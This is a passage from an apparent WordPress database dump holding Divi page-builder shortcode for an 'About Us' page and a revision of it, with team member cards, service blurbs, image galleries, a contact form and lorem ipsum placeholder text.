animation_intensity_slide=\"4%\"]<h2>Fearless Leaeders</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||15px|\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Eduard Ungureanu\" position=\"Project Manager\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-01.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Christina Foster\" position=\"Creative Director\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-06.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"100ms\" locked=\"off\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Jason Wardak\" position=\"Visual Media\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-04.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"200ms\" locked=\"off\"][/et_pb_team_member][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Other Recent Works Section\" _builder_version=\"3.22\" background_color=\"#353740\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_color=\"#fcd21d\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#fcd21d\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>our Work</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#f7f7f7\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" admin_label=\"Other Recent Works Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-06.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"rgba(252,210,29,0.92)\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-05.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"rgba(252,210,29,0.92)\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-02.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"rgba(252,210,29,0.92)\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"View All\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#f7f7f7\" button_border_width=\"4px\" button_border_color=\"#f7f7f7\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#fcd21d\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','about-us','','inherit','closed','closed','','392-revision-v1','','','2020-08-04 19:09:56','2020-08-04 19:09:56','',392,'https://wthtest1.in8.cdn-alpha.com/2020/08/04/392-revision-v1/',0,'revision','',0),(408,1,'2020-08-04 19:13:07','2020-08-04 19:13:07','[et_pb_section fb_built=\"1\" admin_label=\"Page Header\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"67px|0px|67.1875px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>About US</h1>\r[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"About Us Section\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/business_01.jpg\" custom_margin=\"|5%||5%\" custom_margin_tablet=\"\" custom_margin_phone=\"|0px||0px\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%|||\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"5%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-200px\" box_shadow_color=\"#ffffff\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"About Us Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"27px|0px|0px|0px\"][et_pb_column type=\"2_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_color=\"#f7f7f7\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"10%|10%|10%|10%\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_vertical=\"15px\" box_shadow_blur=\"45px\" box_shadow_color=\"rgba(0,0,0,0.15)\" locked=\"off\"]<h2>Building the future</h2>\r\n<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis iste natus sit voluptatem accusantium doloremque laudantium totam rem aperiam, eaque ipsa quae ab.</p>\r\n<p>Illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. <span style=\"font-size: 16px;\">Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit, sed quia non numquam eius modi tempora incidunt ut labore et dolore magnam aliquam quaerat voluptatem.</span></p>\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"UX Research\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim.</span></p>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Brand Identity\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim.</span></p>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Development\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim.</span></p>\r[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim.</span></p>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim.</span></p>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Photography\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim.</span></p>\r[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"110px|0px|110px|0px\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"4%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" locked=\"off\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_font=\"||||||||\" text_text_color=\"#353740\" text_font_size=\"24px\" text_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. Fusce ipsum enim, <strong>ultrices at ante sollicitudin</strong>, faucibus hendrenunc. Nullam tempor nulla eu imperdiet interdum.</span></p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#d4b068\" background_color_gradient_end=\"#ffffff\" background_color_gradient_start_position=\"30%\" background_color_gradient_end_position=\"30%\" custom_padding=\"0px||110px|\" hover_enabled=\"0\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"0px|0px|0px|0px\" animation_direction=\"top\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=1ALjCZkKuUM\" image_src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"3.0.83\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Team Member Section\" _builder_version=\"3.22\" custom_padding=\"110px||60px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" 